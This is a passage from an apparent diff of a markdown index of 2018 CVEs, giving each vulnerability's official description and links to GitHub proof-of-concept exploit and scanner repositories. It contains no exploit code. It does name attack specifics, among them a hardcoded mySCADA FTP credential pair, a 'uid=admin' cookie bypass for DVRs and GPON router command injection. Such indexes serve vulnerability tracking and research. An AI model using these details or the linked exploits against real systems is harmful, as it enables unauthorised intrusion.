Elevation of Privilege Vulnerability." This affects Microsoft Exchange Server. + + +- [WyAtu/CVE-2018-8581](https://github.com/WyAtu/CVE-2018-8581) +- [qiantu88/CVE-2018-8581](https://github.com/qiantu88/CVE-2018-8581) +- [Ridter/Exchange2domain](https://github.com/Ridter/Exchange2domain) + +### CVE-2018-8587 (2018-12-12) + +A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka "Microsoft Outlook Remote Code Execution Vulnerability." This affects Office 365 ProPlus, Microsoft Office, Microsoft Outlook. + + +- [Sunqiz/CVE-2018-8587-reproduction](https://github.com/Sunqiz/CVE-2018-8587-reproduction) + +### CVE-2018-8611 (2018-12-12) + +An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka "Windows Kernel Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [lsw29475/CVE-2018-8611](https://github.com/lsw29475/CVE-2018-8611) + +### CVE-2018-8617 (2018-12-12) + +A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8583, CVE-2018-8618, CVE-2018-8624, CVE-2018-8629. + + +- [bb33bb/cve-2018-8617-aab-r-w-](https://github.com/bb33bb/cve-2018-8617-aab-r-w-) + +### CVE-2018-8639 (2018-12-12) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8641. + + +- [ze0r/CVE-2018-8639-exp](https://github.com/ze0r/CVE-2018-8639-exp) +- [timwhitez/CVE-2018-8639-EXP](https://github.com/timwhitez/CVE-2018-8639-EXP) + +### CVE-2018-8718 (2018-03-27) + +Cross-site request forgery (CSRF) vulnerability in the Mailer Plugin 1.20 for Jenkins 2.111 allows remote authenticated users to send unauthorized mail as an arbitrary user via a /descriptorByName/hudson.tasks.Mailer/sendTestMail request. + + +- [GeunSam2/CVE-2018-8718](https://github.com/GeunSam2/CVE-2018-8718) + +### CVE-2018-8820 (2018-03-28) + +An issue was discovered in Square 9 GlobalForms 6.2.x. A Time Based SQL injection vulnerability in the "match" parameter allows remote authenticated attackers to execute arbitrary SQL commands. It is possible to upgrade access to full server compromise via xp_cmdshell. In some cases, the authentication requirement for the attack can be met by sending the default admin credentials. + + +- [hateshape/frevvomapexec](https://github.com/hateshape/frevvomapexec) + +### CVE-2018-8897 (2018-05-08) + +A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs. + + +- [nmulasmajic/CVE-2018-8897](https://github.com/nmulasmajic/CVE-2018-8897) +- [jiazhang0/pop-mov-ss-exploit](https://github.com/jiazhang0/pop-mov-ss-exploit) +- [can1357/CVE-2018-8897](https://github.com/can1357/CVE-2018-8897) +- [nmulasmajic/syscall_exploit_CVE-2018-8897](https://github.com/nmulasmajic/syscall_exploit_CVE-2018-8897) + +### CVE-2018-8941 (2018-04-03) + +Diagnostics functionality on D-Link DSL-3782 devices with firmware EU v. 1.01 has a buffer overflow, allowing authenticated remote attackers to execute arbitrary code via a long Addr value to the 'set Diagnostics_Entry' function in an HTTP request, related to /userfs/bin/tcapi. + + +- [SECFORCE/CVE-2018-8941](https://github.com/SECFORCE/CVE-2018-8941) + +### CVE-2018-8947 (2018-03-25) + +rap2hpoutre Laravel Log Viewer before v0.13.0 relies on Base64 encoding for l, dl, and del requests, which makes it easier for remote attackers to bypass intended access restrictions, as demonstrated by reading arbitrary files via a dl request. + + +- [scopion/CVE-2018-8947](https://github.com/scopion/CVE-2018-8947) + +### CVE-2018-8970 (2018-03-24) + +The int_x509_param_set_hosts function in lib/libcrypto/x509/x509_vpm.c in LibreSSL 2.7.0 before 2.7.1 does not support a certain special case of a zero name length, which causes silent omission of hostname verification, and consequently allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate. NOTE: the LibreSSL documentation indicates that this special case is supported, but the BoringSSL documentation does not. + + +- [tiran/CVE-2018-8970](https://github.com/tiran/CVE-2018-8970) + +### CVE-2018-9059 (2018-04-20) + +Stack-based buffer overflow in Easy File Sharing (EFS) Web Server 7.2 allows remote attackers to execute arbitrary code via a malicious login request to forum.ghp. NOTE: this may overlap CVE-2014-3791. + + +- [manojcode/easy-file-share-7.2-exploit-CVE-2018-9059](https://github.com/manojcode/easy-file-share-7.2-exploit-CVE-2018-9059) + +### CVE-2018-9075 (2018-09-28) + +For some Iomega, Lenovo, LenovoEMC NAS devices versions 4.1.402.34662 and earlier, when joining a PersonalCloud setup, an attacker can craft a command injection payload using backtick "``" characters in the client:password parameter. As a result, arbitrary commands may be executed as the root user. The attack requires a value __c and iomega parameter. + + +- [beverlymiller818/cve-2018-9075](https://github.com/beverlymiller818/cve-2018-9075) + +### CVE-2018-9160 (2018-03-31) + +SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses. + + +- [mechanico/sickrageWTF](https://github.com/mechanico/sickrageWTF) + +### CVE-2018-9206 (2018-10-11) + +Unauthenticated arbitrary file upload vulnerability in Blueimp jQuery-File-Upload <= v9.22.0 + + +- [Den1al/CVE-2018-9206](https://github.com/Den1al/CVE-2018-9206) +- [Stahlz/JQShell](https://github.com/Stahlz/JQShell) +- [cved-sources/cve-2018-9206](https://github.com/cved-sources/cve-2018-9206) +- [mi-hood/CVE-2018-9206](https://github.com/mi-hood/CVE-2018-9206) + +### CVE-2018-9207 (2018-11-19) + +Arbitrary file upload in jQuery Upload File <= 4.0.2 + + +- [cved-sources/cve-2018-9207](https://github.com/cved-sources/cve-2018-9207) + +### CVE-2018-9208 (2018-11-05) + +Unauthenticated arbitrary file upload vulnerability in jQuery Picture Cut <= v1.1Beta + + +- [cved-sources/cve-2018-9208](https://github.com/cved-sources/cve-2018-9208) + +### CVE-2018-9276 (2018-07-02) + +An issue was discovered in PRTG Network Monitor before 18.2.39. An attacker who has access to the PRTG System Administrator web console with administrative privileges can exploit an OS command injection vulnerability (both on the server and on devices) by sending malformed parameters in sensor or notification management scenarios. + + +- [wildkindcc/CVE-2018-9276](https://github.com/wildkindcc/CVE-2018-9276) +- [andyfeili/CVE-2018-9276](https://github.com/andyfeili/CVE-2018-9276) +- [alvinsmith-eroad/CVE-2018-9276](https://github.com/alvinsmith-eroad/CVE-2018-9276) + +### CVE-2018-9375 +- [IOActive/AOSP-ExploitUserDictionary](https://github.com/IOActive/AOSP-ExploitUserDictionary) + +### CVE-2018-9411 (2024-11-19) + +In decrypt of ClearKeyCasPlugin.cpp there is a possible out-of-bounds write due to a missing bounds check. This could lead to remote arbitrary code execution with no additional execution privileges needed. User interaction is needed for exploitation. + + +- [tamirzb/CVE-2018-9411](https://github.com/tamirzb/CVE-2018-9411) + +### CVE-2018-9468 (2024-11-20) + +In query of DownloadManager.java, there is a possible read/write of arbitrary files due to a permissions bypass. This could lead to local information disclosure and file rewriting with no additional execution privileges needed. User interaction is not needed for exploitation. + + +- [IOActive/AOSP-DownloadProviderHijacker](https://github.com/IOActive/AOSP-DownloadProviderHijacker) + +### CVE-2018-9493 (2018-10-02) + +In the content provider of the download manager, there is a possible SQL injection due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9.0 Android ID: A-111085900 + + +- [IOActive/AOSP-DownloadProviderDbDumper](https://github.com/IOActive/AOSP-DownloadProviderDbDumper) + +### CVE-2018-9539 (2018-11-14) + +In the ClearKey CAS descrambler, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A-113027383 + + +- [tamirzb/CVE-2018-9539](https://github.com/tamirzb/CVE-2018-9539) + +### CVE-2018-9546 +- [IOActive/AOSP-DownloadProviderHeadersDumper](https://github.com/IOActive/AOSP-DownloadProviderHeadersDumper) + +### CVE-2018-9948 (2018-05-17) + +This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of typed arrays. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5380. + + +- [manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958](https://github.com/manojcode/Foxit-Reader-RCE-with-virualalloc-and-shellcode-for-CVE-2018-9948-and-CVE-2018-9958) +- [orangepirate/cve-2018-9948-9958-exp](https://github.com/orangepirate/cve-2018-9948-9958-exp) + +### CVE-2018-9950 (2018-05-17) + +This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF documents. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-5413. + + +- [sharmasandeepkr/PS-2017-13---CVE-2018-9950](https://github.com/sharmasandeepkr/PS-2017-13---CVE-2018-9950) + +### CVE-2018-9951 (2018-05-17) + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.0.29935. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CPDF_Object objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5414. + + +- [sharmasandeepkr/cve-2018-9951](https://github.com/sharmasandeepkr/cve-2018-9951) + +### CVE-2018-9958 (2018-05-17) + +This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 9.0.1.1049. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Text Annotations. When setting the point attribute, the process does not properly validate the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-5620. + + +- [t3rabyt3-zz/CVE-2018-9958--Exploit](https://github.com/t3rabyt3-zz/CVE-2018-9958--Exploit) + +### CVE-2018-9995 (2018-04-10) + +TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. + + +- [ezelf/CVE-2018-9995_dvr_credentials](https://github.com/ezelf/CVE-2018-9995_dvr_credentials) +- [zzh217/CVE-2018-9995_Batch_scanning_exp](https://github.com/zzh217/CVE-2018-9995_Batch_scanning_exp) +- [Huangkey/CVE-2018-9995_check](https://github.com/Huangkey/CVE-2018-9995_check) +- [gwolfs/CVE-2018-9995-ModifiedByGwolfs](https://github.com/gwolfs/CVE-2018-9995-ModifiedByGwolfs) +- [shacojx/cve-2018-9995](https://github.com/shacojx/cve-2018-9995) +- [Cyb0r9/DVR-Exploiter](https://github.com/Cyb0r9/DVR-Exploiter) +- [codeholic2k18/CVE-2018-9995](https://github.com/codeholic2k18/CVE-2018-9995) +- [TateYdq/CVE-2018-9995-ModifiedByGwolfs](https://github.com/TateYdq/CVE-2018-9995-ModifiedByGwolfs) +- [ABIZCHI/CVE-2018-9995_dvr_credentials](https://github.com/ABIZCHI/CVE-2018-9995_dvr_credentials) +- [MrAli-Code/CVE-2018-9995_dvr_credentials](https://github.com/MrAli-Code/CVE-2018-9995_dvr_credentials) +- [likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool](https://github.com/likaifeng0/CVE-2018-9995_dvr_credentials-dev_tool) +- [b510/CVE-2018-9995-POC](https://github.com/b510/CVE-2018-9995-POC) +- [wmasday/HTC](https://github.com/wmasday/HTC) +- [awesome-consumer-iot/HTC](https://github.com/awesome-consumer-iot/HTC) +- [Saeed22487/CVE-2018-9995](https://github.com/Saeed22487/CVE-2018-9995) +- [kienquoc102/CVE-2018-9995-2](https://github.com/kienquoc102/CVE-2018-9995-2) +- [dearpan/cve-2018-9995](https://github.com/dearpan/cve-2018-9995) +- [LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995](https://github.com/LeQuocKhanh2K/Tool_Exploit_Password_Camera_CVE-2018-9995) +- [hoaan1995/CVE-2018-9995](https://github.com/hoaan1995/CVE-2018-9995) +- [ST0PL/DVRFaultNET](https://github.com/ST0PL/DVRFaultNET) +- [K3ysTr0K3R/CVE-2018-9995-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2018-9995-EXPLOIT) +- [Pab450/CVE-2018-9995](https://github.com/Pab450/CVE-2018-9995) +- [arminarab1999/CVE-2018-9995](https://github.com/arminarab1999/CVE-2018-9995) +- [X3RX3SSec/DVR_Sploit](https://github.com/X3RX3SSec/DVR_Sploit) +- [batmoshka55/CVE-2018-9995_dvr_credentials](https://github.com/batmoshka55/CVE-2018-9995_dvr_credentials) +- [dego905/Cam](https://github.com/dego905/Cam) +- [A-Alabdoo/CVE-DVr](https://github.com/A-Alabdoo/CVE-DVr) + +### CVE-2018-10097 (2018-04-13) + +XSS exists in Domain Trader 2.5.3 via the recoverlogin.php email_address parameter. + + +- [ashangp923/CVE-2018-10097](https://github.com/ashangp923/CVE-2018-10097) + +### CVE-2018-10118 (2018-04-15) + +Monstra CMS 3.0.4 has Stored XSS via the Name field on the Create New Page screen under the admin/index.php?id=pages URI, related to plugins/box/pages/pages.admin.php. + + +- [GeunSam2/CVE-2018-10118](https://github.com/GeunSam2/CVE-2018-10118) + +### CVE-2018-10299 (2018-04-23) + +An integer overflow in the batchTransfer function of a smart contract implementation for Beauty Ecosystem Coin (BEC), the Ethereum ERC20 token used in the Beauty Chain economic system, allows attackers to accomplish an unauthorized increase of digital assets by providing two _receivers arguments in conjunction with a large _value argument, as exploited in the wild in April 2018, aka the "batchOverflow" issue. + + +- [phzietsman/batchOverflow](https://github.com/phzietsman/batchOverflow) + +### CVE-2018-10388 (2019-12-23) + +Format string vulnerability in the logMess function in TFTP Server SP 1.66 and earlier allows remote attackers to perform a denial of service or execute arbitrary code via format string sequences in a TFTP error packet. + + +- [0xddaa/CVE-2018-10388](https://github.com/0xddaa/CVE-2018-10388) + +### CVE-2018-10467 +- [alt3kx/CVE-2018-10467](https://github.com/alt3kx/CVE-2018-10467) + +### CVE-2018-10517 (2018-04-27) + +In CMS Made Simple (CMSMS) through 2.2.7, the "module import" operation in the admin dashboard contains a remote code execution vulnerability, exploitable by an admin user, because an XML Package can contain base64-encoded PHP code in a data element. + + +- [0x00-0x00/CVE-2018-10517](https://github.com/0x00-0x00/CVE-2018-10517) + +### CVE-2018-10546 (2018-04-29) + +An issue was discovered in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. An infinite loop exists in ext/iconv/iconv.c because the iconv stream filter does not reject invalid multibyte sequences. + + +- [dsfau/CVE-2018-10546](https://github.com/dsfau/CVE-2018-10546) + +### CVE-2018-10562 (2018-05-04) + +An issue was discovered on Dasan GPON home routers. Command Injection can occur via the dest_host parameter in a diag_action=ping request to a GponForm/diag_Form URI. Because the router saves ping results in /tmp and transmits them to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output. + + +- [ExiaHan/GPON](https://github.com/ExiaHan/GPON) +- [649/Pingpon-Exploit](https://github.com/649/Pingpon-Exploit) +- [Choudai/GPON-LOADER](https://github.com/Choudai/GPON-LOADER) +- [c0ld1/GPON_RCE](https://github.com/c0ld1/GPON_RCE) +- [ATpiu/CVE-2018-10562](https://github.com/ATpiu/CVE-2018-10562) + +### CVE-2018-10583 (2018-05-01) + +An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document. + + +- [MrTaherAmine/CVE-2018-10583](https://github.com/MrTaherAmine/CVE-2018-10583) +- [octodi/CVE-2018-10583](https://github.com/octodi/CVE-2018-10583) + +### CVE-2018-10715 +- [alt3kx/CVE-2018-10715](https://github.com/alt3kx/CVE-2018-10715) + +### CVE-2018-10732 (2018-05-28) + +The REST API in Dataiku DSS before 4.2.3 allows remote attackers to obtain sensitive information (i.e., determine if a username is valid) because of profile pictures visibility. + + +- [alt3kx/CVE-2018-10732](https://github.com/alt3kx/CVE-2018-10732) + +### CVE-2018-10821 (2018-06-14) + +Cross-site scripting (XSS) vulnerability in backend/pages/modify.php in BlackCatCMS 1.3 allows remote authenticated users with the Admin role to inject arbitrary web script or HTML via the search panel. + + +- [BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3](https://github.com/BalvinderSingh23/Cross-Site-Scripting-Reflected-XSS-Vulnerability-in-blackcatcms_v1.3) + +### CVE-2018-10920 (2018-08-02) + +Improper input validation bug in DNS resolver component of Knot Resolver before 2.4.1 allows remote attacker to poison cache. + + +- [shutingrz/CVE-2018-10920_PoC](https://github.com/shutingrz/CVE-2018-10920_PoC) + +### CVE-2018-10933 (2018-10-17) + +A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4. A malicious client could create channels without first performing authentication, resulting in unauthorized access. + + +- [SoledaD208/CVE-2018-10933](https://github.com/SoledaD208/CVE-2018-10933) +- [blacknbunny/CVE-2018-10933](https://github.com/blacknbunny/CVE-2018-10933) +- [hook-s3c/CVE-2018-10933](https://github.com/hook-s3c/CVE-2018-10933) +- [kn6869610/CVE-2018-10933](https://github.com/kn6869610/CVE-2018-10933) +- [jobroche/libssh-scanner](https://github.com/jobroche/libssh-scanner) +- [likekabin/CVE-2018-10933_ssh](https://github.com/likekabin/CVE-2018-10933_ssh) +- [likekabin/CVE-2018-10933-libSSH-Authentication-Bypass](https://github.com/likekabin/CVE-2018-10933-libSSH-Authentication-Bypass) +- [marco-lancini/hunt-for-cve-2018-10933](https://github.com/marco-lancini/hunt-for-cve-2018-10933) +- [hackerhouse-opensource/cve-2018-10933](https://github.com/hackerhouse-opensource/cve-2018-10933) +- [cve-2018/cve-2018-10933](https://github.com/cve-2018/cve-2018-10933) +- [jas502n/CVE-2018-10933](https://github.com/jas502n/CVE-2018-10933) +- [ninp0/cve-2018-10933_poc](https://github.com/ninp0/cve-2018-10933_poc) +- [pghook/CVE-2018-10933_Scanner](https://github.com/pghook/CVE-2018-10933_Scanner) +- [Virgula0/POC-CVE-2018-10933](https://github.com/Virgula0/POC-CVE-2018-10933) +- [shifa123/pythonprojects-CVE-2018-10933](https://github.com/shifa123/pythonprojects-CVE-2018-10933) +- [xFreed0m/CVE-2018-10933](https://github.com/xFreed0m/CVE-2018-10933) +- [Bifrozt/CVE-2018-10933](https://github.com/Bifrozt/CVE-2018-10933) +- [r3dxpl0it/CVE-2018-10933](https://github.com/r3dxpl0it/CVE-2018-10933) +- [ivanacostarubio/libssh-scanner](https://github.com/ivanacostarubio/libssh-scanner) +- [throwawayaccount12312312/precompiled-CVE-2018-10933](https://github.com/throwawayaccount12312312/precompiled-CVE-2018-10933) +- [reanimat0r/bpnd-libssh](https://github.com/reanimat0r/bpnd-libssh) +- [ensimag-security/CVE-2018-10933](https://github.com/ensimag-security/CVE-2018-10933) +- [0xadaw/libSSH-bypass](https://github.com/0xadaw/libSSH-bypass) +- [sambiyal/CVE-2018-10933-POC](https://github.com/sambiyal/CVE-2018-10933-POC) +- [nikhil1232/LibSSH-Authentication-Bypass](https://github.com/nikhil1232/LibSSH-Authentication-Bypass) +- [Kurlee/LibSSH-exploit](https://github.com/Kurlee/LibSSH-exploit) +- [crispy-peppers/Libssh-server-CVE-2018-10933](https://github.com/crispy-peppers/Libssh-server-CVE-2018-10933) +- [youkergav/CVE-2018-10933](https://github.com/youkergav/CVE-2018-10933) +- [kristyna-mlcakova/CVE-2018-10933](https://github.com/kristyna-mlcakova/CVE-2018-10933) +- [lalishasanduwara/CVE-2018-10933](https://github.com/lalishasanduwara/CVE-2018-10933) +- [JoSecMx/CVE-2018-10933_Scanner](https://github.com/JoSecMx/CVE-2018-10933_Scanner) +- [cyberharsh/Libssh-server-CVE-2018-10933](https://github.com/cyberharsh/Libssh-server-CVE-2018-10933) +- [Rubikcuv5/CVE-2018-10933](https://github.com/Rubikcuv5/CVE-2018-10933) +- [SilasSpringer/CVE-2018-10933](https://github.com/SilasSpringer/CVE-2018-10933) +- [HSw109/CVE-2018-10933](https://github.com/HSw109/CVE-2018-10933) + +### CVE-2018-10936 (2018-08-30) + +A weakness was found in postgresql-jdbc before version 42.2.5. It was possible to provide an SSL Factory and not check the host name if a host name verifier was not provided to the driver. This could lead to a condition where a man-in-the-middle attacker could masquerade as a trusted server by providing a certificate for the wrong host, as long as it was signed by a trusted CA. + + +- [tafamace/CVE-2018-10936](https://github.com/tafamace/CVE-2018-10936) + +### CVE-2018-10949 (2018-05-10) + +mailboxd in Zimbra Collaboration Suite 8.8 before 8.8.8; 8.7 before 8.7.11.Patch3; and 8.6 allows Account Enumeration by leveraging a Discrepancy between the "HTTP 404 - account is not active" and "HTTP 401 - must authenticate" errors. + + +- [0x00-0x00/CVE-2018-10949](https://github.com/0x00-0x00/CVE-2018-10949) + +### CVE-2018-10993 +- [nicolastsk/cve-2018-10993](https://github.com/nicolastsk/cve-2018-10993) + +### CVE-2018-11235 (2018-05-30) + +In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs "git clone --recurse-submodules" because submodule "names" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with "../" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server. + + +- [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235) +- [vmotos/CVE-2018-11235](https://github.com/vmotos/CVE-2018-11235) +- [Choihosu/cve-2018-11235](https://github.com/Choihosu/cve-2018-11235) +- [CHYbeta/CVE-2018-11235-DEMO](https://github.com/CHYbeta/CVE-2018-11235-DEMO) +- [Kiss-sh0t/CVE-2018-11235-poc](https://github.com/Kiss-sh0t/CVE-2018-11235-poc) +- [H0K5/clone_and_pwn](https://github.com/H0K5/clone_and_pwn) +- [knqyf263/CVE-2018-11235](https://github.com/knqyf263/CVE-2018-11235) +- [ygouzerh/CVE-2018-11235](https://github.com/ygouzerh/CVE-2018-11235) +- [qweraqq/CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE) +- [AnonymKing/CVE-2018-11235](https://github.com/AnonymKing/CVE-2018-11235) +- [0rx1/CVE-2018-11235](https://github.com/0rx1/CVE-2018-11235) +- [cchang27/CVE-2018-11235-test](https://github.com/cchang27/CVE-2018-11235-test) +- [nthuong95/CVE-2018-11235](https://github.com/nthuong95/CVE-2018-11235) +- [xElkomy/CVE-2018-11235](https://github.com/xElkomy/CVE-2018-11235) +- [jongmartinez/CVE-2018-11235-PoC](https://github.com/jongmartinez/CVE-2018-11235-PoC) +- [MohamedTarekq/test-CVE-2018-11235](https://github.com/MohamedTarekq/test-CVE-2018-11235) +- [j4k0m/CVE-2018-11235](https://github.com/j4k0m/CVE-2018-11235) +- [twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration](https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration) +- [EmaVirgRep/CVE-2018-11235](https://github.com/EmaVirgRep/CVE-2018-11235) +- [theerachaich/lab](https://github.com/theerachaich/lab) + +### CVE-2018-11311 (2018-05-20) + +A hardcoded FTP username of myscada and password of Vikuk63 in 'myscadagate.exe' in mySCADA myPRO 7 allows remote attackers to access the FTP server on port 2121, and upload files or list directories, by entering these credentials. + + +- [EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password](https://github.com/EmreOvunc/mySCADA-myPRO-7-Hardcoded-FTP-Username-and-Password) + +### CVE-2018-11321 (2018-05-22) + +An issue was discovered in com_fields in Joomla! Core before 3.8.8. Inadequate filtering allows users authorised to create custom fields to manipulate the filtering options and inject an unvalidated option. + + +- [ExploitCN/CVE-2018-11321](https://github.com/ExploitCN/CVE-2018-11321) + +### CVE-2018-11450 (2018-07-09) + +A reflected Cross-Site-Scripting (XSS) vulnerability has been identified in Siemens PLM Software TEAMCENTER (V9.1.2.5). If a user visits the login portal through the URL crafted by the attacker, the attacker can insert html/javascript and thus alter/rewrite the login portal page. Siemens PLM Software TEAMCENTER V9.1.3 and newer are not affected. + + +- [LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability](https://github.com/LucvanDonk/Siemens-Siemens-PLM-Software-TEAMCENTER-Reflected-Cross-Site-Scripting-XSS-vulnerability) + +### CVE-2018-11510 (2018-06-28) + +The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an unauthenticated remote code execution vulnerability in the portal/apis/aggrecate_js.cgi file by embedding OS commands in the 'script' parameter. + + +- [mefulton/CVE-2018-11510](https://github.com/mefulton/CVE-2018-11510) + +### CVE-2018-11517 (2018-05-28) + +mySCADA myPRO 7 allows remote attackers to discover all ProjectIDs in a project by sending all of the prj parameter values from 870000 to 875000 in t=0&rq=0 requests to TCP port 11010. + + +- [EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure](https://github.com/EmreOvunc/mySCADA-myPRO-7-projectID-Disclosure) + +### CVE-2018-11564 (2018-06-01) + +Stored XSS in YOOtheme Pagekit 1.0.13 and earlier allows a user to upload malicious code via the picture upload feature. A user with elevated privileges could upload a photo to the system in an SVG format. This file will be uploaded to the system and it will not be stripped or filtered. The user can create a link on the website pointing to "/storage/poc.svg" that will point to http://localhost/pagekit/storage/poc.svg. When a user comes along to click that link, it will trigger a XSS attack. + + +- [GeunSam2/CVE-2018-11564](https://github.com/GeunSam2/CVE-2018-11564) + +### CVE-2018-11631 (2018-05-31) + +Rondaful M1 Wristband Smart Band 1 devices allow remote attackers to send an arbitrary number of call or SMS notifications via crafted Bluetooth Low Energy (BLE) traffic. + + +- [ColeShelly/bandexploit](https://github.com/ColeShelly/bandexploit) + +### CVE-2018-11686 (2019-07-03) + +The Publish Service in FlexPaper (later renamed FlowPaper) 2.3.6 allows remote code execution via setup.php and change_config.php. + + +- [mpgn/CVE-2018-11686](https://github.com/mpgn/CVE-2018-11686) + +### CVE-2018-11759 (2018-10-31) + +The Apache Web Server (httpd) specific code that normalised the requested path before matching it to the URI-worker map in Apache Tomcat JK (mod_jk) Connector 1.2.0 to 1.2.44 did not handle some edge cases correctly. If only a sub-set of the URLs supported by Tomcat were exposed via httpd, then it was possible for a specially constructed request to expose application functionality through the reverse proxy that was not intended for clients accessing the application via the reverse proxy. It was also possible in some configurations for a specially constructed request to bypass the access controls configured in httpd. While there is some overlap between this issue and CVE-2018-1323, they are not identical. + + +- [immunIT/CVE-2018-11759](https://github.com/immunIT/CVE-2018-11759) +- [Jul10l1r4/Identificador-CVE-2018-11759](https://github.com/Jul10l1r4/Identificador-CVE-2018-11759) +- [julioliraup/Identificador-CVE-2018-11759](https://github.com/julioliraup/Identificador-CVE-2018-11759) + +### CVE-2018-11761 (2018-09-19) + +In Apache Tika 0.1 to 1.18, the XML parsers were not configured to limit entity expansion. They were therefore vulnerable to an entity expansion vulnerability which can lead to a denial of service attack. + + +- [brianwrf/CVE-2018-11761](https://github.com/brianwrf/CVE-2018-11761) + +### CVE-2018-11770 (2018-08-13) + +From version 1.3.0 onward, Apache Spark's standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property 'spark.authenticate.secret' establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. This REST API is also used by Mesos, when set up to run in cluster mode (i.e., when also running MesosClusterDispatcher), for job submission. Future versions of Spark will improve documentation on these points, and prohibit setting 'spark.authenticate.secret' when running the REST APIs, to make this clear. Future versions will also disable the REST API by default in the standalone master by changing the default value of 'spark.master.rest.enabled' to 